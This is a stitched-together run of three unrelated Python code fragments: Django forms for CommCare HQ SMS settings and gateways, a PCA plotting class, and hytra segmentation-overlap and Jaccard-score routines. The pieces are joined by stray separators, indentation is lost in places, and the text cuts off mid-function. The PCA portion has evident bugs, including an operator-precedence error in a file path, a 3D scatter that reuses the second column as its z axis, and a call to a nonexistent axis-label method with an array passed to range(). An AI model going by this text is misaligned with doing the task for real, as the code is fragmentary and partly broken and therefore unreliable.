return self.cleaned_data.get("use_custom_chat_template") == CUSTOM
def clean_custom_chat_template(self):
if not self._cchq_is_previewer:
return None
value = self._clean_dependent_field("use_custom_chat_template",
"custom_chat_template")
if value is not None and value not in settings.CUSTOM_CHAT_TEMPLATES:
raise ValidationError(_("Unknown custom template identifier."))
return value
def _clean_time_window_json(self, field_name):
try:
time_window_json = json.loads(self.cleaned_data.get(field_name))
except ValueError:
raise ValidationError(_("An error has occurred. Please try again, "
"and if the problem persists, please report an issue."))
result = []
for window in time_window_json:
day = window.get("day")
start_time = window.get("start_time")
end_time = window.get("end_time")
time_input_relationship = window.get("time_input_relationship")
try:
day = int(day)
assert day >= -1 and day <= 6
except (ValueError, AssertionError):
raise ValidationError(_("Invalid day chosen."))
if time_input_relationship == TIME_BEFORE:
end_time = validate_time(end_time)
result.append(DayTimeWindow(
day=day,
start_time=None,
end_time=end_time,
))
elif time_input_relationship == TIME_AFTER:
start_time = validate_time(start_time)
result.append(DayTimeWindow(
day=day,
start_time=start_time,
end_time=None,
))
else:
start_time = validate_time(start_time)
end_time = validate_time(end_time)
if start_time >= end_time:
raise ValidationError(_("End time must come after start "
"time."))
result.append(DayTimeWindow(
day=day,
start_time=start_time,
end_time=end_time,
))
return result
def clean_use_restricted_sms_times(self):
return self.cleaned_data.get("use_restricted_sms_times") == ENABLED
def clean_restricted_sms_times_json(self):
if self.cleaned_data.get("use_restricted_sms_times"):
return self._clean_time_window_json("restricted_sms_times_json")
else:
return []
def clean_use_sms_conversation_times(self):
return self.cleaned_data.get("use_sms_conversation_times") == ENABLED
def clean_sms_conversation_times_json(self):
if self.cleaned_data.get("use_sms_conversation_times"):
return self._clean_time_window_json("sms_conversation_times_json")
else:
return []
def clean_count_messages_as_read_by_anyone(self):
return (self.cleaned_data.get("count_messages_as_read_by_anyone")
== ENABLED)
def clean_sms_case_registration_enabled(self):
return (self.cleaned_data.get("sms_case_registration_enabled")
== ENABLED)
def clean_sms_case_registration_type(self):
return self._clean_dependent_field("sms_case_registration_enabled",
"sms_case_registration_type")
    def get_user_group_or_location(self, object_id):
        """Resolve *object_id* to a case-sharing SQLLocation, Group, or
        CommCareUser in this domain, trying in that order; returns None on
        no match (or a deleted group)."""
        try:
            return SQLLocation.active_objects.get(
                domain=self._cchq_domain,
                location_id=object_id,
                location_type__shares_cases=True,
            )
        except SQLLocation.DoesNotExist:
            pass
        try:
            group = Group.get(object_id)
            if group.doc_type == 'Group' and group.domain == self._cchq_domain and group.case_sharing:
                return group
            elif group.is_deleted:
                return None
            # Non-matching, non-deleted groups fall through to the user lookup.
        except ResourceNotFound:
            pass
        return self.get_user(object_id)
def get_user(self, object_id):
try:
user = CommCareUser.get(object_id)
if user.doc_type == 'CommCareUser' and user.domain == self._cchq_domain:
return user
except ResourceNotFound:
pass
return None
def clean_sms_case_registration_owner_id(self):
if not self.cleaned_data.get("sms_case_registration_enabled"):
return None
value = self.cleaned_data.get("sms_case_registration_owner_id")
if not value:
raise ValidationError(_("This field is required."))
obj = self.get_user_group_or_location(value)
if not isinstance(obj, (CommCareUser, Group, SQLLocation)):
raise ValidationError(_("Please select again"))
return value
def clean_sms_case_registration_user_id(self):
if not self.cleaned_data.get("sms_case_registration_enabled"):
return None
value = self.cleaned_data.get("sms_case_registration_user_id")
if not value:
raise ValidationError(_("This field is required."))
obj = self.get_user(value)
if not isinstance(obj, CommCareUser):
raise ValidationError(_("Please select again"))
return value
def clean_sms_mobile_worker_registration_enabled(self):
return (self.cleaned_data.get("sms_mobile_worker_registration_enabled")
== ENABLED)
def clean_sms_conversation_length(self):
# Just cast to int, the ChoiceField will validate that it is an integer
return int(self.cleaned_data.get("sms_conversation_length"))
def clean_custom_daily_outbound_sms_limit(self):
if not self._cchq_is_previewer:
return None
if self.cleaned_data.get('override_daily_outbound_sms_limit') != ENABLED:
return None
value = self.cleaned_data.get("custom_daily_outbound_sms_limit")
if not value:
raise ValidationError(_("This field is required"))
return value
class BackendForm(Form):
    """Base form for creating/editing an SMS gateway (backend).

    Subclasses override `gateway_specific_fields` to contribute
    provider-specific configuration. When `_cchq_domain` is None the form
    manages a global backend, otherwise a domain-level one.
    """
    # Populated in __init__ from kwargs; None domain == global backend.
    _cchq_domain = None
    _cchq_backend_id = None
    name = CharField(
        label=ugettext_noop("Name")
    )
    description = CharField(
        label=ugettext_noop("Description"),
        widget=forms.Textarea,
        required=False,
    )
    give_other_domains_access = BooleanField(
        required=False,
        label=ugettext_noop("Give other domains access.")
    )
    authorized_domains = CharField(
        required=False,
        label=ugettext_noop("List of authorized domains")
    )
    reply_to_phone_number = CharField(
        required=False,
        label=ugettext_noop("Reply-To Phone Number"),
    )
    inbound_api_key = CharField(
        required=False,
        label=ugettext_lazy("Inbound API Key"),
        disabled=True,
    )
    @property
    def is_global_backend(self):
        """True when this form edits a global backend (no owning domain)."""
        return self._cchq_domain is None
    @property
    def general_fields(self):
        """Crispy fields for the "General Settings" fieldset."""
        fields = [
            crispy.Field('name', css_class='input-xxlarge'),
            crispy.Field('description', css_class='input-xxlarge', rows="3"),
            crispy.Field('reply_to_phone_number', css_class='input-xxlarge'),
        ]
        if not self.is_global_backend:
            # Domain-level backends may be shared with other domains.
            fields.extend([
                crispy.Field(
                    twbscrispy.PrependedText(
                        'give_other_domains_access', '', data_bind="checked: share_backend"
                    )
                ),
                crispy.Div(
                    'authorized_domains',
                    data_bind="visible: showAuthorizedDomains",
                ),
            ])
        if self._cchq_backend_id:
            # Editing an existing backend: surface its inbound API key if the
            # backend type allows showing it.
            backend = SQLMobileBackend.load(self._cchq_backend_id)
            if backend.show_inbound_api_key_during_edit:
                self.fields['inbound_api_key'].initial = backend.inbound_api_key
                fields.append(crispy.Field('inbound_api_key'))
        return fields
    def __init__(self, *args, **kwargs):
        """Pop `button_text`, `domain`, and `backend_id` kwargs, then build
        the crispy layout (general + gateway-specific + load balancing)."""
        button_text = kwargs.pop('button_text', _("Create SMS Gateway"))
        self._cchq_domain = kwargs.pop('domain')
        self._cchq_backend_id = kwargs.pop('backend_id')
        super(BackendForm, self).__init__(*args, **kwargs)
        self.helper = HQFormHelper()
        self.helper.form_method = 'POST'
        self.helper.layout = crispy.Layout(
            crispy.Fieldset(
                _('General Settings'),
                *self.general_fields
            ),
            self.gateway_specific_fields,
            crispy.Fieldset(
                _("Phone Numbers"),
                crispy.Div(
                    data_bind="template: {"
                              " name: 'ko-load-balancing-template', "
                              " data: $data"
                              "}",
                ),
                data_bind="visible: use_load_balancing",
            ),
            hqcrispy.FormActions(
                StrictButton(
                    button_text,
                    type="submit",
                    css_class='btn-primary'
                ),
            ),
        )
        if self._cchq_backend_id:
            # When editing, don't allow changing the name because name might be
            # referenced as a contact-level backend preference.
            # By setting disabled to True, Django makes sure the value won't change
            # even if something else gets posted.
            self.fields['name'].disabled = True
    @property
    def gateway_specific_fields(self):
        """Hook for subclasses: extra crispy fields for this gateway type."""
        return crispy.Div()
    def clean_name(self):
        """Uppercase, require, and uniqueness-check the backend name."""
        value = self.cleaned_data.get("name")
        if value is not None:
            value = value.strip().upper()
        if value is None or value == "":
            raise ValidationError(_("This field is required."))
        if re.compile(r"\s").search(value) is not None:
            raise ValidationError(_("Name may not contain any spaces."))
        if self.is_global_backend:
            # We're using the form to create a global backend, so
            # ensure name is not duplicated among other global backends
            is_unique = SQLMobileBackend.name_is_unique(
                value,
                backend_id=self._cchq_backend_id
            )
        else:
            # We're using the form to create a domain-level backend, so
            # ensure name is not duplicated among other backends owned by this domain
            is_unique = SQLMobileBackend.name_is_unique(
                value,
                domain=self._cchq_domain,
                backend_id=self._cchq_backend_id
            )
        if not is_unique:
            raise ValidationError(_("Name is already in use."))
        return value
    def clean_authorized_domains(self):
        """Split the comma-separated domain list; empty unless sharing is on."""
        if not self.cleaned_data.get("give_other_domains_access"):
            return []
        else:
            value = self.cleaned_data.get("authorized_domains")
            if value is None or value.strip() == "":
                return []
            else:
                return [domain.strip() for domain in value.split(",")]
    def clean_reply_to_phone_number(self):
        """Strip whitespace; blank values are normalized to None."""
        value = self.cleaned_data.get("reply_to_phone_number")
        if value is None:
            return None
        else:
            value = value.strip()
            if value == "":
                return None
            else:
                return value
class BackendMapForm(Form):
catchall_backend_id = ChoiceField(
label=ugettext_lazy("Catch-All Gateway"),
required=False
)
backend_map = CharField(required=False)
    def __init__(self, *args, **kwargs):
        """Pop the available *backends*, fill the catch-all choices, and
        build the crispy layout."""
        backends = kwargs.pop('backends')
        super(BackendMapForm, self).__init__(*args, **kwargs)
        self.set_catchall_choices(backends)
        self.setup_crispy()
def set_catchall_choices(self, backends):
backend_choices = [('', _("(none)"))]
backend_choices.extend([
(backend.pk, backend.name) for backend in backends
])
self.fields['catchall_backend_id'].choices = backend_choices
    def setup_crispy(self):
        """Build the crispy layout: prefix map (knockout-rendered),
        catch-all dropdown, and Save button."""
        self.helper = HQFormHelper()
        self.helper.form_method = 'POST'
        self.helper.layout = crispy.Layout(
            crispy.Fieldset(
                _("Default Gateways"),
                hqcrispy.B3MultiField(
                    _("Default Gateway by Prefix"),
                    hqcrispy.ErrorsOnlyField('backend_map'),
                    crispy.Div(
                        data_bind="template: {"
                                  " name: 'ko-template-backend-map', "
                                  " data: $data"
                                  "}"
                    ),
                ),
                'catchall_backend_id',
            ),
            hqcrispy.FormActions(
                StrictButton(
                    _("Save"),
                    type="submit",
                    css_class='btn-primary'
                ),
            ),
        )
def _clean_prefix(self, prefix):
try:
prefix = int(prefix)
if prefix <= 0:
raise ValueError()
except (ValueError, TypeError):
raise ValidationError(_("Please enter a positive number for the prefix."))
return str(prefix)
def _clean_backend_id(self, backend_id):
try:
backend_id = int(backend_id)
except (ValueError, TypeError):
raise ValidationError(_("Invalid Backend Specified."))
try:
backend = SQLMobileBackend.load(backend_id)
except:
raise ValidationError(_("Invalid Backend Specified."))
if (
backend.deleted or
not backend.is_global or
backend.backend_type != SQLMobileBackend.SMS
):
raise ValidationError(_("Invalid Backend Specified."))
return backend_id
def clean_backend_map(self):
value = self.cleaned_data.get('backend_map')
try:
value = json.loads(value)
except:
raise ValidationError(_("An unexpected error occurred. Please reload | |
that takes a dataframe or a
genomic region alternatively to calculate a PCA.
@df_or_gene Dataframe or GenomicRegion containing d-dimensional data
@columns Dataframe columns that contain the actual data
@classlabel_column column that contains class labels
@axis 1 if columns are instances, 0 if rows are instances
@k number of dimensions
"""
ML_Base.__init__(self, name, genes_or_df_or_loading_function, columns, dependencies, annotators, row_id_column, scaler, imputer, missing_value)
self.result_dir = Path('results') / 'PCA' / self.name
self.cache_dir = Path('cache') / 'pca' / self.name
self.result_dir.mkdir(parents = True, exist_ok = True)
self.cache_dir.mkdir(parents = True, exist_ok = True)
self.d = len(columns)
self.k = k
self.label_mangler = label_mangler
self.class_label_dict_or_function = class_label_dict_or_function
self.axis = axis
self.axis_label = 'principal component'
def fit_transform(self):
raise NotImplementedError()
def dump_transformed_matrix(self):
def dunp():
pass
pass
def plot_2d_projection(self, filename = None, color_callable = None, dependencies = [], class_order = None):
"""
This assumes that self.transformed_matrix is an array-like object with shape (n_samples, n_components)
"""
if filename is None:
outfile = self.result_dir / self.name+"_2D_projection.pdf"
else:
outfile = filename
if self.k < 2:
raise ValueError("No 2D projection possible with only %s components, set k >= 2." % self.k)
def plot():
if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
class_label_dict = self.class_label_dict_or_function
elif hasattr(self.class_label_dict_or_function, '__call__'):
class_label_dict = self.class_label_dict_or_function()
else:
raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
markers = itertools.cycle(('o', 'v', '^', '*', 's', '+'))
figure = plt.figure(figsize=(8, 8))
ax_data = figure.add_subplot(111)
matrix_columns = ["{}_{}".format(self.axis_label, i) for i in range(2)]
df = pd.DataFrame(self.transformed_matrix[:,:2], columns = matrix_columns)
print(df.shape)
#1 if columns are instances, 0 if rows are instances
if self.axis == 1:
ids = self.columns
else:
ids = self.df[self.row_id_column].values
if class_label_dict is not None:
df['class_label'] = [class_label_dict[instance_id] for instance_id in ids]
if 'class_label' in df.columns:
if class_order is None:
labels = list(set(class_label_dict.values()))
else:
labels = class_order
for i, label in enumerate(labels):
df_sub = df[df['class_label'] == label][matrix_columns]
matrix_sub = df_sub.as_matrix()
ax_data.plot(matrix_sub[:,0],matrix_sub[:,1], marker = next(markers), markersize=7, alpha=0.5, label=label, linestyle="None")
plt.title('Transformed samples with class labels')
else:
color = 'blue'
if color_callable is not None:
color = color_callable(ids)
ax_data.scatter(self.transformed_matrix[:,0], self.transformed_matrix[:,1], marker = 'o', c=color, cmap = 'plasma', alpha=0.5)
plt.title('Transformed samples without classes')
xmin = np.floor(np.min(self.transformed_matrix[:,0]))
ymin = np.floor(np.min(self.transformed_matrix[:,1]))
xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
ax_data.set_xlim([1.3*xmin, 1.3*xmax])
ax_data.set_ylim([1.3*ymin, 1.3*ymax])
ax_data.set_xlabel('1st %s'%self.axis_label)
ax_data.set_ylabel('2nd %s'%self.axis_label)
ax_data.legend()
for i, instance_id in enumerate(ids):
plt.annotate(
self.label_mangler(instance_id),
xy = (self.transformed_matrix[i,0], self.transformed_matrix[i,1]), xytext = (-1, 1),
textcoords = 'offset points', ha = 'right', va = 'bottom', size = 3)
figure.savefig(outfile)
return ppg.FileGeneratingJob(outfile, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load()).depends_on(dependencies)
def plot_3d_projection(self, filename = None, color_callable = None, dependencies = [], class_order = None):
"""
This assumes that self.transformed_matrix is an array-like object with shape (n_samples, n_components)
"""
if self.k < 3:
raise ValueError("No 3D prjection possible with only %s components, set k >= 3." % self.k)
if filename is None:
outfile = os.path.join(self.result_dir, self.name+"_3D_projection.pdf")
else:
outfile = filename
def plot():
if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
class_label_dict = self.class_label_dict_or_function
elif hasattr(self.class_label_dict_or_function, '__call__'):
class_label_dict = self.class_label_dict_or_function()
else:
raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
markers = itertools.cycle(('o', 'v', '^', '*', 's', '+'))
figure = plt.figure(figsize=(8, 8))
ax3d = figure.add_subplot(111, projection = '3d')
matrix_columns = ["{}_{}".format(self.axis_label, i) for i in range(3)]
df = pd.DataFrame(self.transformed_matrix[:,:3], columns = matrix_columns)
#1 if columns are instances, 0 if rows are instances
if self.axis == 1:
ids = self.columns
else:
ids = self.df[self.row_id_column].values
if class_label_dict is not None:
df['class_label'] = [class_label_dict[instance_id] for instance_id in ids]
if 'class_label' in df.columns:
if class_order is None:
labels = list(set(class_label_dict.values()))
else:
labels = class_order
for i, label in enumerate(labels):
df_sub = df[df['class_label'] == label][matrix_columns]
matrix_sub = df_sub.as_matrix()
ax3d.plot(
matrix_sub[:,0],
matrix_sub[:,1],
matrix_sub[:,2],
marker = next(markers),
markersize=7,
alpha=0.5,
label=label,
linestyle="None"
)
plt.title('Transformed samples with class labels')
else:
color = 'blue'
if color_callable is not None:
color = color_callable(ids)
ax3d.scatter(
self.transformed_matrix[:,0],
self.transformed_matrix[:,1],
self.transformed_matrix[:,1],
marker = 'o',
c=color,
cmap = 'plasma',
alpha=0.5
)
plt.title('Transformed samples without classes')
xmin = np.floor(np.min(self.transformed_matrix[:,0]))
ymin = np.floor(np.min(self.transformed_matrix[:,1]))
zmin = np.floor(np.min(self.transformed_matrix[:,2]))
xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
zmax = np.ceil(np.max(self.transformed_matrix[:,2]))
ax3d.set_xlim([1.3*xmin, 1.3*xmax])
ax3d.set_ylim([1.3*ymin, 1.3*ymax])
ax3d.set_zlim([1.3*zmin, 1.3*zmax])
ax3d.set_xlabel('1st %s'%self.axis_label)
ax3d.set_ylabel('2nd %s'%self.axis_label)
ax3d.set_zlabel('3rd %s'%self.axis_label)
ax3d.legend()
for i, instance_id in enumerate(ids):
plt.annotate(
instance_id,
xy = (self.transformed_matrix[i,0], self.transformed_matrix[i,1]), xytext = (-1, 1),
textcoords = 'offset points', ha = 'right', va = 'bottom', size = 3)
ax3d.text(self.transformed_matrix[i,0],self.transformed_matrix[i,1],self.transformed_matrix[i,2], '%s' % (self.label_mangler(instance_id)), size=3, zorder=1, color='k')
figure.savefig(outfile)
return ppg.FileGeneratingJob(outfile, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load()).depends_on(dependencies)
    def plot_3d_data(self):
        """
        This is for plotting the data directly, assuming that it is 3D ... for testing purposes.
        """
        filename = os.path.join(self.result_dir, self.name + "3d_data.pdf")
        def plot():
            colors = ['blue', 'red', 'green', 'orange', 'purple', 'cyan']
            markers = ['o', 'v', '^', '*', 's', '+']
            figure = plt.figure(figsize=(10, 10))
            ax3d = figure.add_subplot(111, projection = '3d')
            # NOTE(review): other methods use self.class_label_dict_or_function;
            # self.class_label_dict is not assigned anywhere visible here --
            # confirm this attribute exists on instances.
            if self.class_label_dict is not None:
                last = 0
                # NOTE(review): this assumes self.matrix rows are grouped by
                # class, in the dict's iteration order -- verify with the loader.
                for i, class_label in enumerate(self.class_label_dict):
                    l = len(self.class_label_dict[class_label])
                    ax3d.plot(
                        self.matrix[last:last+l,0],
                        self.matrix[last:last+l,1],
                        self.matrix[last:last+l,2],
                        markers[i],
                        markersize=7,
                        color=colors[i],
                        alpha=0.5,
                        label=class_label
                    )
                    last = last+l
                plt.title('Transformed samples with class labels')
            else:
                # NOTE(review): this branch plots self.transformed_matrix while
                # the labeled branch plots self.matrix -- confirm intent.
                ax3d.plot(
                    self.transformed_matrix[:,0],
                    self.transformed_matrix[:,1],
                    self.transformed_matrix[:,2],
                    'o',
                    markersize=7,
                    color='blue',
                    alpha=0.5
                )
                plt.title('Transformed samples without classes')
            # Axis limits: doubled data range in each dimension.
            xmin = np.floor(np.min(self.transformed_matrix[:,0]))
            ymin = np.floor(np.min(self.transformed_matrix[:,1]))
            zmin = np.floor(np.min(self.transformed_matrix[:,2]))
            xmax = np.ceil(np.max(self.transformed_matrix[:,0]))
            ymax = np.ceil(np.max(self.transformed_matrix[:,1]))
            zmax = np.ceil(np.max(self.transformed_matrix[:,2]))
            ax3d.set_xlim([2*xmin, 2*xmax])
            ax3d.set_ylim([2*ymin, 2*ymax])
            ax3d.set_zlim([2*zmin, 2*zmax])
            ax3d.set_xlabel('%s %i'%(self.axis_label, 1))
            ax3d.set_ylabel('%s %i'%(self.axis_label, 2))
            ax3d.set_zlabel('%s %i'%(self.axis_label, 3))
            ax3d.legend()
            figure.savefig(filename)
        return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix())
    def plot_jitter_component(self, filename = None, df_colors = None, component = 1, bins = 30, axis_label = 'component', class_order = None, styles = ['histogram', 'swarm', 'distribution', 'splines']):
        """Plot 1-D views of a single embedding component in several styles
        (stacked histogram, swarm, fitted distribution, spline fit), one
        subplot per style.

        NOTE(review): `styles` is a mutable default argument (not mutated
        here, but fragile); `component` indexes transformed_matrix, and the
        DataFrame below assumes at least 3 components -- confirm k >= 3.
        """
        if filename is None:
            filename = os.path.join(self.result_dir, self.name + "component_projection_%i.pdf" % component)
        def plot():
            import seaborn as sns
            # Class labels may be supplied directly or via a deferred callable.
            if isinstance(self.class_label_dict_or_function, dict) or self.class_label_dict_or_function is None:
                class_label_dict = self.class_label_dict_or_function
            elif hasattr(self.class_label_dict_or_function, '__call__'):
                class_label_dict = self.class_label_dict_or_function()
            else:
                raise ValueError("class_label_dict was of type {}".format(type(self.class_label_dict_or_function)))
            #calc
            embedding = self.transformed_matrix
            df = pd.DataFrame({'1' : embedding[:,0], '2' : embedding[:,1], '3' : embedding[:,2]})
            x = sorted(embedding[:,component])
            max_value = np.max(x)
            min_value = np.min(x)
            rangeX = [min_value, max_value]
            width = (rangeX[1] - rangeX[0]) / bins
            # Dump the raw component values next to the figure.
            # NOTE(review): written before the 'color' column is added below.
            df.to_csv(filename+'.tsv', sep = '\t', index = False)
            # Color per instance: explicit df_colors wins, then class labels,
            # then a single default color.
            if df_colors is not None:
                df['color'] = df_colors['color'].values
            elif class_label_dict is not None:
                if self.axis == 1:
                    ids = self.columns
                else:
                    ids = self.df[self.row_id_column].values
                labels = [class_label_dict[instance_id] for instance_id in ids]
                df['color'] = labels
            else:
                df['color'] = ['b']*len(df)
            #plot
            df = df.sort_values(str(component))
            if class_order is None:
                colors = set(df['color'].values)
            else:
                colors = class_order
            fig, axes = plt.subplots(len(styles), sharex = True, figsize = (8, len(styles)*3))
            for i, style in enumerate(styles):
                if style == 'histogram':
                    axes[i].hist(
                        [df[df['color'] == c][str(component)].values for c in colors],
                        bins = bins,
                        width = width,
                        range = rangeX,
                        density = False,
                        histtype = 'barstacked',
                        label = colors
                    )
                    axes[i].set_title('Histogram')
                    axes[i].legend()
                elif style == 'swarm':
                    sns.swarmplot(x = df[str(component)], y=[""]*len(df), hue = df['color'], hue_order = colors, ax=axes[i])
                    #axes[i].get_legend().remove()
                    axes[i].set_title('Projection of %s %s' % (axis_label, component))
                elif style == 'distribution':
                    # Fit an empirical distribution per class and draw its pdf.
                    for c in colors:
                        values = df[df['color'] == c][str(component)].values
                        histogram = np.histogram(sorted(values), bins = bins, range = rangeX, density = False)
                        distribution = scipy.stats.rv_histogram(histogram)
                        fitted_pdf = distribution.pdf(x)
                        axes[i].plot(x, fitted_pdf)
                    axes[i].set_title('Fitted distribution')
                elif style == 'splines':
                    # Cubic-spline interpolation of the per-class histogram.
                    for c in colors:
                        values = df[df['color'] == c][str(component)].values
                        histogram = np.histogram(sorted(values), bins = bins, range = rangeX, density = False)
                        spl = interp1d(histogram[1][:-1], histogram[0], kind='cubic', fill_value = 0, bounds_error = False)
                        axes[i].plot(x, spl(x), label = c)
                    plt.legend()
                    axes[i].set_title('Cubic spline interpolation')
                else:
                    raise ValueError('Unknown style {}. Use any or all of [histogram, swarm, distribution, splines].')
            plt.suptitle('Projection of %s %s.' % (axis_label, component), y = 1)
            plt.tight_layout()
            fig.savefig(filename)
        return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform()).depends_on(self.init_data_matrix()).depends_on(self.load())
def plot_variance(self):
"""
Plots explained variance for each component.
"""
filename = os.path.join(self.result_dir, self.name + "variance.pdf")
def plot():
fig = plt.figure(figsize = (5, 5))
explained_variance = self.model.explained_variance_
x = np.array(range(len(explained_variance)), dtype = int)
plt.bar(x, explained_variance)
plt.title('Explained variance of the components')
plt.gca().set_xlabels(['%i %s' % (ii, self.axis_label) for ii in range(explained_variance)])
plt.tight_layout()
fig.savefig(filename)
return ppg.FileGeneratingJob(filename, plot).depends_on(self.fit_transform())
def dump_correlation(self, genes, columns, dependencies = [], annotators = []):
outfile = genes.result_dir / f"{self.name}_correlation.tsv"
def dump():
to_df = {'stable_id' : [], 'name' : []}
| |
import numpy as np
import logging
import time
import concurrent.futures
from hytra.core.probabilitygenerator import (
IlpProbabilityGenerator,
computeDivisionFeaturesOnCloud,
computeRegionFeaturesOnCloud,
DummyExecutor,
)
from hytra.util.progressbar import ProgressBar
logger = logging.getLogger(__name__)
def findConflictingHypothesesInSeparateProcess(
    frame,
    labelImageFilenames,
    labelImagePaths,
    labelImageFrameIdToGlobalId,
    pluginPaths=["hytra/plugins"],
    imageProviderPluginName="LocalImageLoader",
):
    """
    Look which objects between different segmentation hypotheses (given as different labelImages)
    overlap, and return a dictionary of those overlapping situations.

    Returns ``(frame, overlaps)`` where ``overlaps`` maps each globalId to the
    list of globalIds it conflicts with (recorded in both directions).

    Meant to be run in its own process using `concurrent.futures.ProcessPoolExecutor`
    """
    # The plugin manager must be constructed inside the worker process.
    from hytra.pluginsystem.plugin_manager import TrackingPluginManager

    pluginManager = TrackingPluginManager(pluginPaths=pluginPaths, verbose=False)
    pluginManager.setImageProvider(imageProviderPluginName)
    overlaps = {}  # overlap dict: key=globalId, value=[list of globalIds]
    numHypotheses = len(labelImageFilenames)
    for idxA in range(numHypotheses):
        labelImageA = pluginManager.getImageProvider().getLabelImageForFrame(
            labelImageFilenames[idxA],
            labelImagePaths[idxA],
            frame,
        )
        for idxB in range(idxA + 1, numHypotheses):
            labelImageB = pluginManager.getImageProvider().getLabelImageForFrame(
                labelImageFilenames[idxB],
                labelImagePaths[idxB],
                frame,
            )
            # check for overlaps - even a 1-pixel overlap is enough to be mutually exclusive!
            for objectIdA in np.unique(labelImageA):
                if objectIdA == 0:
                    continue
                overlappingIds = set(np.unique(labelImageB[labelImageA == objectIdA])) - {0}
                overlappingGlobalIds = [
                    labelImageFrameIdToGlobalId[(labelImageFilenames[idxB], frame, o)]
                    for o in overlappingIds
                ]
                globalIdA = labelImageFrameIdToGlobalId[(labelImageFilenames[idxA], frame, objectIdA)]
                # record the conflict symmetrically
                overlaps.setdefault(globalIdA, []).extend(overlappingGlobalIds)
                for globalIdB in overlappingGlobalIds:
                    overlaps.setdefault(globalIdB, []).append(globalIdA)
    return frame, overlaps
def computeJaccardScoresOnCloud(
    frame,
    labelImageFilenames,
    labelImagePaths,
    labelImageFrameIdToGlobalId,
    groundTruthFilename,
    groundTruthPath,
    groundTruthMinJaccardScore,
    pluginPaths=["hytra/plugins"],
    imageProviderPluginName="LocalImageLoader",
):
    """
    Compute jaccard scores of all objects in the different segmentations with the ground truth for that frame.
    Returns a dictionary of overlapping GT labels and the score per globalId in that frame, as well as
    a dictionary specifying the matching globalId and score for every GT label (as a list ordered by score, best match last).
    Meant to be run in its own process using `concurrent.futures.ProcessPoolExecutor`
    """
    # set up plugin manager (must happen inside the worker process)
    from hytra.pluginsystem.plugin_manager import TrackingPluginManager

    pluginManager = TrackingPluginManager(pluginPaths=pluginPaths, verbose=False)
    pluginManager.setImageProvider(imageProviderPluginName)
    scores = {}  # globalId -> [(gtLabel, jaccardScore), ...]
    gtToGlobalIdMap = {}  # (frame, gtLabel) -> [(globalId, jaccardScore), ...], best match last
    groundTruthLabelImage = pluginManager.getImageProvider().getLabelImageForFrame(
        groundTruthFilename, groundTruthPath, frame
    )
    for labelImageIndexA in range(len(labelImageFilenames)):
        labelImageA = pluginManager.getImageProvider().getLabelImageForFrame(
            labelImageFilenames[labelImageIndexA],
            labelImagePaths[labelImageIndexA],
            frame,
        )
        # check for overlaps - even a 1-pixel overlap is enough to be mutually exclusive!
        for objectIdA in np.unique(labelImageA):
            if objectIdA == 0:
                # label 0 is background
                continue
            globalIdA = labelImageFrameIdToGlobalId[(labelImageFilenames[labelImageIndexA], frame, objectIdA)]
            overlap = groundTruthLabelImage[labelImageA == objectIdA]
            overlappingGtElements = set(np.unique(overlap)) - set([0])
            for gtLabel in overlappingGtElements:
                # compute Jaccard scores
                intersectingPixels = np.sum(overlap == gtLabel)
                unionPixels = np.sum(np.logical_or(groundTruthLabelImage == gtLabel, labelImageA == objectIdA))
                jaccardScore = float(intersectingPixels) / float(unionPixels)
                # append to object's score list
                scores.setdefault(globalIdA, []).append((gtLabel, jaccardScore))
                # store this as GT mapping if there was no better object for this GT label yet
                # (the list's last element is the current best match)
                if jaccardScore > groundTruthMinJaccardScore and (
                    (frame, gtLabel) not in gtToGlobalIdMap or gtToGlobalIdMap[(frame, gtLabel)][-1][1] < jaccardScore
                ):
                    gtToGlobalIdMap.setdefault((frame, gtLabel), []).append((globalIdA, jaccardScore))
    # sort all gt mappings by ascending jaccard score
    for _, v in gtToGlobalIdMap.items():
        v.sort(key=lambda x: x[1])
    return frame, scores, gtToGlobalIdMap
class ConflictingSegmentsProbabilityGenerator(IlpProbabilityGenerator):
"""
Specialization of the probability generator that computes all the features on its own,
to have more than one segmentation hypotheses per timeframe.
First step: make sure that objects from different hypotheses have different IDs
* do that by adding the maxId of the "previous" segmentation hypothesis for that frame
* store reference which hypothesis this segment comes from in Traxel, so that we can
reconstruct a result from the graph and images
"""
def __init__(
self,
ilpOptions,
additionalLabelImageFilenames,
additionalLabelImagePaths,
turnOffFeatures=[],
useMultiprocessing=True,
pluginPaths=["hytra/plugins"],
verbose=False,
):
""" """
super(ConflictingSegmentsProbabilityGenerator, self).__init__(
ilpOptions, turnOffFeatures, useMultiprocessing, pluginPaths, verbose
)
# store the additional segmentation hypotheses and check that they are of the same size
self._labelImageFilenames = additionalLabelImageFilenames
self._labelImagePaths = additionalLabelImagePaths
for filename, path in zip(self._labelImageFilenames, self._labelImagePaths):
assert self._pluginManager.getImageProvider().getImageShape(filename, path) == self.shape
assert self._pluginManager.getImageProvider().getTimeRange(filename, path) == self.timeRange
self._labelImageFilenames.insert(0, ilpOptions.labelImageFilename)
self._labelImagePaths.insert(0, ilpOptions.labelImagePath)
self._labelImageFrameIdToGlobalId = {} # map from (labelImageFilename, frame, id) to (id)
    def fillTraxels(self, usePgmlink=True, ts=None, fs=None, dispyNodeIps=[], turnOffFeatures=[]):
        """
        Compute all the features and predict object count as well as division probabilities.
        Store the resulting information (and all other features) inside `self.TraxelsPerFrame`.
        It also computes which of the segmentation hypotheses overlap and are mutually exclusive, and stores
        that per traxel, in each traxel's `conflictingTraxelIds` list. (Can only conflict within the timeframe)

        :param usePgmlink: must be `False` for this derived class (note: the inherited
            default is `True`, so callers must pass `False` explicitly).
        :param ts: traxelstore, forwarded to the base implementation.
        :param fs: feature store, forwarded to the base implementation.
        :param dispyNodeIps: must be an empty list -- Dispy is not supported here.
        :param turnOffFeatures: feature names to skip during feature computation.

        WARNING: usePgmlink is not supported for this derived class, so must be `False`!
        WARNING: distributed computation via Dispy is not supported here, so dispyNodeIps must be an empty list!
        """
        assert not usePgmlink
